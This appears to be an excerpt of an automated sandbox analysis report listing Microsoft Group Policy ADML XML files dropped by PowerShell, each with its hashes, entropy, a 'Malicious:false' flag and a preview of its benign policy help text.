                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ActiveDirectoryBackup_Help">This policy setting allows you to manage the Active Directory Domain Services (AD DS) backup of Trusted Platform Module (TPM) owner information. ....TPM owner information includes a cryptographic hash of the TPM owner password. Certain TPM commands can only be run by the TPM owner. This hash authorizes the TPM to run these commands. ....If you enable this policy setting, TPM owner information will be automatically and silently backed up to AD DS when you use Windows to set or change a TP
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (416), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14958
                                                                                                                                                                                                        Entropy (8bit):4.684169671948835
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ErZjCAOTCAClCIkwgLtL99S6hOmL0wD4mHAwq8Qh5Kxk4kxgxWx+FNPUX0E:XAZALIYLtL9ILa8blKxk4kxgxWxFkE
                                                                                                                                                                                                        MD5:0F06155D65FCA728F2D46F0A96F4801B
                                                                                                                                                                                                        SHA1:E8D67D09DF0AED3FC5AED0832D901F31830D8A8C
                                                                                                                                                                                                        SHA-256:C170A92E97B43769613F0217D452B39D28A856AD93E95C0CD2E9A40FCC04E6A0
                                                                                                                                                                                                        SHA-512:62DAF44885B775BB39F4E38F5188F0FD2096C78A0F5328451F239D78E4F9325224A8A0AAF769DDA8127CCD879F32F6A012B896E01AABAD8133D738B77B54528D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AutoComplete">Turn off AutoComplete integration with Input Panel</string>.. <string id="AutoCompleteExplain">Turns off the integration of application auto complete lists with Tablet PC Input Panel in applications where this behavior is available.....Tablet PC Input Panel is a Tablet PC accessory that enables you to use handwriting or an on-screen keyboard to enter text, symbols, numbers, or keyboard shortcuts.....If you enable this policy, application auto complete lists will never appear next to Input Panel.
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (546), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6673
                                                                                                                                                                                                        Entropy (8bit):4.787936688249674
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmXFnAAWTYvS60sTs2ssufgMA7I16D4K9OuNtFV:E6SCKi78DK9XNtn
                                                                                                                                                                                                        MD5:166E80C965CED6606C2DA93D9A03B421
                                                                                                                                                                                                        SHA1:A7651889CBFEF22000E75B348428689C0E755BF7
                                                                                                                                                                                                        SHA-256:88F472A0DA1243EA84662AE4D730D6B86EE53E1901D7CC73EEA724218BD9EBE4
                                                                                                                                                                                                        SHA-512:0CB95E31997AF6E77C155081FCA24FBDE9B401944251ED0D3C04F4A35F017BC3BBB4CFAEEEA8175D56C64CA9352F84DFC45827D76C0DB95CBE314F562C3C4CE0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Accessories">Accessories</string>.. <string id="Cursors">Cursors</string>.. <string id="DisableInkball">Do not allow Inkball to run</string>.. <string id="DisableInkball_Help">Prevents start of InkBall game.....If you enable this policy, the InkBall game will not run.....If you disable this policy, the InkBall game will run.....If you do not configure this policy, the InkBall game will run.</string>.. <string id="DisableJournal">Do not allow Windows Journal to be run</string>.. <string id="
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (579), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7038
                                                                                                                                                                                                        Entropy (8bit):4.643182607339355
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Ey3uDxqKgSDQ0DiMDoK5DuJW+ibACSYZCn:rWYaQ0Pnu4PjSZ
                                                                                                                                                                                                        MD5:09BB6BBD535E6B16043D7DE703670523
                                                                                                                                                                                                        SHA1:3E7743A2557844CCCC6E5AE42827E676577FE9F4
                                                                                                                                                                                                        SHA-256:00250A97BC62D5C01E534907317937337008B28110DD7AB88A5D32AA347A3B9E
                                                                                                                                                                                                        SHA-512:118B1B0C181AD2DD89955BFDB828E10381F481B81321295AF016A2536B86A26F302F20DFC542974CD512C48F9F2B080CE482D08031BB9B2033328267BF093DD9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowBrowse">Prohibit Browse</string>.. <string id="AllowBrowseHelp">Limits newly scheduled to items on the user's Start menu, and prevents the user from changing the scheduled program for existing tasks.....This setting removes the Browse button from the Schedule Task Wizard and from the Task tab of the properties dialog box for a task. Also, users cannot edit the "Run" box or the "Start in" box that determine the program and path for a task.....As a result, when users create a task, they must select a progra
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (325), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11395
                                                                                                                                                                                                        Entropy (8bit):4.633029483097701
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:EytLqsKeNTdPL5M8R1QfkSK1GOROjzazDzLh5/Cbl4Zgx9IQCmJwgjRLEJn:zM8R1QiGwCCDhtS41
                                                                                                                                                                                                        MD5:B04329C131F6270E21143E3A48884E73
                                                                                                                                                                                                        SHA1:21A2CA3E301813810D7B3874D625C4FABC5DD96A
                                                                                                                                                                                                        SHA-256:17A7E0C29F6FAD55F06306ECE4251A6BF7D40BB30C3178385D01CFFC805A1164
                                                                                                                                                                                                        SHA-512:E50307FA3358D4CAC0C2CE8C5DFD568DDC0795E07DD38A5F655C6BF0F2F071B8D5479D6F89483959054B7256E0BCB09631F8E902B64F0F19CBB051030815633E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="HideSCABattery">Remove the battery meter</string>.. <string id="HideSCABattery_Help">This policy setting allows you to remove the battery meter from the system control area.....If you enable this policy setting, the battery meter is not displayed in the system notification area.....If you disable or do not configure this policy setting, the battery meter is displayed in the system notification area.</string>.. <string id="HideSCANetwork">Remove the networking icon</string>.. <string id="HideSCANetwor
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (495), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):19641
                                                                                                                                                                                                        Entropy (8bit):4.878122311324998
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:HTFGnX5V42B4kc7w3p98BlDJQ2yhfOBV41eCFksM08wjblv:HTI5/b2KfSiNbh
                                                                                                                                                                                                        MD5:F835CA2B1226B25600345F974B8706C4
                                                                                                                                                                                                        SHA1:1B7BA254D3835BA025A8D68A8AC757019081AA09
                                                                                                                                                                                                        SHA-256:E827705FA042FDD68C493B5F0159FE68B10F6B310C957A7F23F45F20DB14666E
                                                                                                                                                                                                        SHA-512:183483215CAE2BA72A226AC50F6057D566A23E411C3BAABF0BBBBB6145046E85049F4B526CDA4591C145F6A92AB75567661885EDCECCE13B60EC0C00DD8E28FA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TS_APP_COMPATIBILITY">Application Compatibility</string>.. <string id="TS_APP_COMPATIBILITY_Help">Controls application compatibility settings on an RD Session Host server</string>.. <string id="TS_TIME_ZONE">Allow time zone redirection</string>.. <string id="TS_TIME_ZONE_EXPLAIN">This policy setting allows you to specify whether the client computer redirects its time zone settings to the Remote Desktop Services session.....If you enable this policy setting, clients that are capable of time zone redir
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (638), with CRLF line terminators
Category:dropped
Size (bytes):127562
Entropy (8bit):4.836430182678649
Encrypted:false
SSDEEP:1536:9h4lfgUCtmBM22pFN8z0u753oq+I/jIqGUZRGUCFUvyP+YA4RhVjn:9hrtHrzGDiI/jIqGYRGQi3Vjn
MD5:3602B346F09097D79EAA8029915B67F9
SHA1:4BB802511857288C2ADA07AD532CB19E7CD5CD9D
SHA-256:FF74BE25815C0CA023FAD48EA35E6FA32566065485534D01842D617EB39F8ACE
SHA-512:77DDACF30B5D72A159A726FE040218F25D8E902C58CAE6D100F8B01255415C461C55A3645F643FB52D63B8079F0FCE6107CB96358EBBC7141A380D445C4B195A
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TS_SUPPORTED_Windows8_or_ARM">At least Windows 8 or Windows RT</string>.. <string id="TS_SUPPORTED_Windows8_Server">At least Windows Server 2012 R2</string>.. <string id="TS_SUPPORTED_Windows8_Enterprise_AND_Server"> At least Windows 8 Enterprise or Windows Server 2012 R2</string>.. <string id="TS_SUPPORTED_ONLY_Windows7_OR_SERVER2K8R2">Windows 7 or Windows Server 2008 R2 (and their subsequent Service Packs) only</string>.. <string id="TS_SUPPORTED_ONLY_LEGACY">Windows Server 2008 R2, Windows Se

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):2359
Entropy (8bit):4.864135463263543
Encrypted:false
SSDEEP:48:cgeD5x8gm8fKlmesQ6SmH6Se6dSGH6crboeoO6S86Ss6dS6H6cr3DJUlptRdpEFV:LeD5pm5mZymDm8rboB8OwAr3DJUlfv2n
MD5:9DDDBE09EE87B401376670F58F52B8CB
SHA1:3E3D3EFB918717C290B5E1FAAA19721160449A05
SHA-256:36E567DB6F269F42865BC122835CBF10C7DE187AFF70BA93BA81C045486A134A
SHA-512:10A5388C2C26BCAB4E38A9507A958BA2A33A09184F003632C51C9405376E43CE27E96C3F7812C51766DD71855ACD81F1ACF4B096EA263F44C2B9623663C04738
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableThumbnails">Turn off the display of thumbnails and only display icons.</string>.. <string id="DisableThumbnails_Help">This policy setting allows you to configure how File Explorer displays thumbnail images or icons on the local computer.....File Explorer displays thumbnail images by default. ....If you enable this policy setting, File Explorer displays only icons and never displays thumbnail images.....If you disable or do not configure this policy setting, File Explorer displays only thumbnail images.<

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):2055
Entropy (8bit):4.807218997990388
Encrypted:false
SSDEEP:48:cgeD5x8gm8fKKU6oYecyziGWMlHqf+encFV:LeD5pm9HAd+FV
MD5:9562339E02D38BECE2D7D3C89EE47766
SHA1:1512A1230E2585B62FB78E1EE9E147FBCCF91D8F
SHA-256:A376991D45DD68CD83E2A76C75F136B75033FDE16297EC2868755268AF2869E2
SHA-512:531900F6AAADECA8DEF9C70F2E2D9A1A930237EE3E74CB1CF1172A2637DB340382E5108BD138F701CB533643EEA2514C2C43A1CC373B7F1EEB2FF103BCBF4AD5
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TouchInput">Touch Input</string>.. <string id="TouchInputOff">Turn off Tablet PC touch input</string>.. <string id="TouchInputOff_Help">Turn off Tablet PC touch input....Turns off touch input, which allows the user to interact with their computer using their finger.....If you enable this setting, the user will not be able to produce input with touch. They will not be able to use touch input or touch gestures such as tap and double tap, the touch pointer, and other touch-specific features.....If you disabl

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (658), with CRLF line terminators
Category:dropped
Size (bytes):43896
Entropy (8bit):4.667568456685799
Encrypted:false
SSDEEP:768:FkIqBn46Y+xwhTjlMIbNzjWtqqnOTLTn8Gu/:Fkze+xwhTjlPWttSvnnA
MD5:5F55E2D434E9BE9D2AC4108C2AE42106
SHA1:6785C7EF4F183004F4F9CCF9D383DABF8914BFF3
SHA-256:D9459CCAD7106CC5A8665076C9D74C39D211D11A6F33870385528389826264D9
SHA-512:6109AEFDA8D656767F0A00C75F2241A454D85AA51B36338E1F5103A96BD32BB5B6571183132FD2468AE74A298623E7000A6F1C94F5760E55C92EB6DD01537BB0
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AddAdminGroupToRUP">Add the Administrators security group to roaming user profiles</string>.. <string id="AddAdminGroupToRUP_Help">This policy setting adds the Administrator security group to the roaming user profile share.....Once an administrator has configured a user's roaming profile, the profile will be created at the user's next login. The profile is created at the location that is specified by the administrator.....For the Windows XP Professional and Windows 2000 Professional operating systems, the defa

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (1087), with CRLF line terminators
Category:dropped
Size (bytes):97809
Entropy (8bit):4.865980267514194
Encrypted:false
SSDEEP:1536:yF3hamxu6iF2VflT2VfD7oaV6Z32VfDt2Kn+DZcZy:NYTNR96Zy
MD5:11CDF6A637203126A5F35982F599C1AF
SHA1:6E92BB3C55BAD050302EAFD9C7A722798B9FC0F1
SHA-256:CC9BCBDB2FBBD9B3A529CFEFAEE37231BE9D712840E0FBD456D8AF9947E15F14
SHA-512:AB39EA7CE5C379C90D4BAF6F4C506CDBDA17F29D75050CA10E713275EFAB609E0FBCD2B08E3D80E3F8EDCB410192B96C272789D10C1B71D9698B58BD75C6FE4A
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ActiveDirectoryBackup_Help">This policy setting allows you to manage the Active Directory Domain Services (AD DS) backup of BitLocker Drive Encryption recovery information. This provides an administrative method of recovering data encrypted by BitLocker to prevent data loss due to lack of key information. This policy setting is only applicable to computers running Windows Server 2008 or Windows Vista.....If you enable this policy setting, BitLocker recovery information is automatically and silently backed up to AD

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (721), with CRLF line terminators
Category:dropped
Size (bytes):16499
Entropy (8bit):4.944041721958569
Encrypted:false
SSDEEP:384:A/mnOQzg68GwhRsw6uHGtY2PQJyGizYTO2jF4TTt:JnORtuYTOmF4TTt
MD5:7FAF3A73C8DBAE90E511742BBB51AADD
SHA1:D651E3B70B5C8A6CE7FDCD92D15189CB6880A361
SHA-256:B62D8648EB65A947AE783F67A0E3F2276545DF1CD265CF4AA513DC53DF6882E0
SHA-512:74A1533992353ADFD8E33365AE91DC7CF914A488D5E406D537344FE6F3565AB669DF221082E96DE47E172A4916B695B27499E129BAA9C8FB9B51C9EB264196BD
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="W32TIME_CONFIG_EXPLAIN">This policy setting allows you to specify Clock discipline and General values for the Windows Time service (W32time) for domain controllers including RODCs.....If you enable this policy setting, you can specify the following Clock discipline, General and RODC parameters for this service.....If you disable or do not configure this policy setting, Windows Time service uses the defaults of each of the following parameters.....Several of the following values are scalar, which means that they on

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (583), with CRLF line terminators
Category:dropped
Size (bytes):5728
Entropy (8bit):4.528195330790601
Encrypted:false
SSDEEP:96:LeD5pmuOd2s+XGRFUv41c845cJ6RygNEfHZbWvK64kqo5UidD/PPTifE8h2WNOFV:EdOd2/XGbbqcSlNEf5CvWo5Ui9/n+MGW
MD5:7D5B3A4F151213CB0EFDACFA335A6AA3
SHA1:F36C9F3F58804077CE1AB9D41B29073D1E988752
SHA-256:5EC9152E44738D44848AB532D269EC0D51612FD60B5FA8A7A3D53DC0395164A2
SHA-512:C4DBFA582B75C32016FFE6AF8B5BEBFE2C9DBEB3A80BF1F8319CB1EAF76B043632E0E7A043457263EC41448A74C411920121EB194D04180E712C347F15F27EA7
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Connection Manager Group Policy Settings</displayName>.. <description>Windows Connection Manager Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="WCM_Category">Windows Connection Manager</string>.. <string id="WCM_BlockNonDomain">Prohibit connection to non-domain networks when connected to domain authenticated network</string>.. <string id="WCM_BlockNonDomain_Help">This policy setting prevents computers from connecting to both a domain based network and a non-domain based network at the same time... .. If this policy setting is enabled, the computer responds to automatic and manual networ

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (513), with CRLF line terminators
Category:dropped
Size (bytes):3666
Entropy (8bit):4.76342138021097
Encrypted:false
SSDEEP:48:cgeD5x8gm8fKMs4jm9y1YJWl5p0BsYlvPB9ZMKFdL5dbsEIqALJ/PUq1XWgV:LeD5pmYs4jkWlnCsKPB9ZRJHYV/PptV
MD5:3C7A58453A2A54C65A82137819FCBFA2
SHA1:635B1128546EA8A86DD984ADDE64BA1D0B8961A0
SHA-256:4A49D6F192FF5E859FE003DB2584049D5F54615F80E5B977156F7D51F4752105
SHA-512:DD3B7A0BE79E23F4B477080468B74BDA4D23730A2177DC4A092893718B2F0C2192AEB2885C60E0F2DF48AD0AA65E55535A61251325C1DFBB74844C867573139A
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiDpsScenarioDataSizeLimitPolicy">Diagnostics: Configure scenario retention</string>.. <string id="WdiDpsScenarioDataSizeLimitPolicyExplain">This policy setting determines the data retention limit for Diagnostic Policy Service (DPS) scenario data.....If you enable this policy setting, you must enter the maximum size of scenario data that should be retained in megabytes. Detailed troubleshooting data related to scenarios will be retained until this limit is reached.....If you disable or do not configure this p

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (369), with CRLF line terminators
Category:dropped
Size (bytes):7410
Entropy (8bit):4.5477372257913125
Encrypted:false
SSDEEP:96:LeD5pmIA4ik0bcMuEB4odMuQ0AuwsurKK4GA1TunDzDsZwuE7MteWQPyqyjV:EQkdMuEWCMuesurKKHKTuAwuE7MIWKxA
MD5:77C2A2EB749EBCA17124B632612CE191
SHA1:3B7F2E4594DB1D354755184C0127825F6A81E7D5
SHA-256:058509712BF20A49CC276BDF4AB6B0CCDC3550501DA0F2C4529E234E9AAE6068
SHA-512:6FC63B4998C6E746D82F5680FB67BE2CEADC227EFFE5A07DFF1E94E69A1711AD207EA4481DF25E722D57BBBCFD14F4C395C086D06E3071D1237099C8518AB313
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NotificationsCategory">Notifications</string>.. <string id="NoTileNotification">Turn off tile notifications</string>.. <string id="NoTileNotificationExplain">.. This policy setting turns off tile notifications..... If you enable this policy setting, applications and system features will not be able to update their tiles and tile badges in the Start screen..... If you disable or do not configure this policy setting, tile and badge notifications are enabled and can be turned off b
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1085
                                                                                                                                                                                                        Entropy (8bit):4.9989682223802285
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yIjoCg/IPGISwIIPFV:cgeD5x8gm8fK/DPlEIPFV
                                                                                                                                                                                                        MD5:8D40CA00FF9CB0AEABED1F9B98D06B2B
                                                                                                                                                                                                        SHA1:9B8819C7D0DB7C760990DE409BDE733A8BA179CC
                                                                                                                                                                                                        SHA-256:5D5FD8758FFCD1BCB7A28025E05D5749AC4B691ADF0B9E2589C096B75E5DC5C4
                                                                                                                                                                                                        SHA-512:4978350FE3A30EA539B38C0322D00F6853CE1227FB15859FD98BC8A655B4949E8B633622D41AC22552280624BE5E017A4566198BC6FF896A25A8BA83D8825AA8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TurnOffWinCal">Turn off Windows Calendar</string>.. <string id="TurnOffWinCal_Explain">Windows Calendar is a feature that allows users to manage appointments and tasks by creating personal calendars, publishing them, and subscribing to other users calendars.....If you enable this setting, Windows Calendar will be turned off.....If you disable or do not configure this setting, Windows Calendar will be turned on.....The default is for Windows Calendar to be turned on.</string>.. <string id="WinCal">Windows
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2477
                                                                                                                                                                                                        Entropy (8bit):4.814838125716894
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yaGryIBOKOxOZghgBMZvGM2MWIxTgbaoR01bF2jV:cgeD5x8gm8fKeBOVx2ghUD92YN7V
                                                                                                                                                                                                        MD5:0CDEAB62595877530194386C7F6A6661
                                                                                                                                                                                                        SHA1:1F0AA6E09C0C4123912F41639AB16534669D374E
                                                                                                                                                                                                        SHA-256:00FF3D345DDD3586734720DDDE1E688A31AC0CA468ED85B8A322CBCFD4BB03EE
                                                                                                                                                                                                        SHA-512:C1CE4AB1F1878E7DFE16DBC6065E9145EEB23914208F5C0A815D4DC18B4BFD5DF5BB588E6042F80E1EAB56001F5BFD8EF5F1CA061EF43D1440B3215FCE774B91
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableNamedPipeShutdownPolicyDescription">Turn off legacy remote shutdown interface</string>.. <string id="DisableNamedPipeShutdownPolicyDescription_Help">This policy setting controls the legacy remote shutdown interface (named pipe). The named pipe remote shutdown interface is needed in order to shutdown this system from a remote Windows XP or Windows Server 2003 system.....If you enable this policy setting, the system does not create the named pipe remote shutdown interface.....If you disable or do not conf
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (530), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8978
                                                                                                                                                                                                        Entropy (8bit):4.691590472306916
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Ehq33S6hDBnHY0+4F1QvJNF1QmQcZNDoFYuu/+AsdegiYKECaVBMi8JfRs:mqBFUhYXZMi8c
                                                                                                                                                                                                        MD5:AD266AC436809BBDC0A19A05E80904A8
                                                                                                                                                                                                        SHA1:9515ABF43047427E1A13E2930C9AB6C171C6EA0B
                                                                                                                                                                                                        SHA-256:0E5BA42E689B38880E0DCB236FC16C4EB9E1809DC94CFCF5AA511B79FAFBA26F
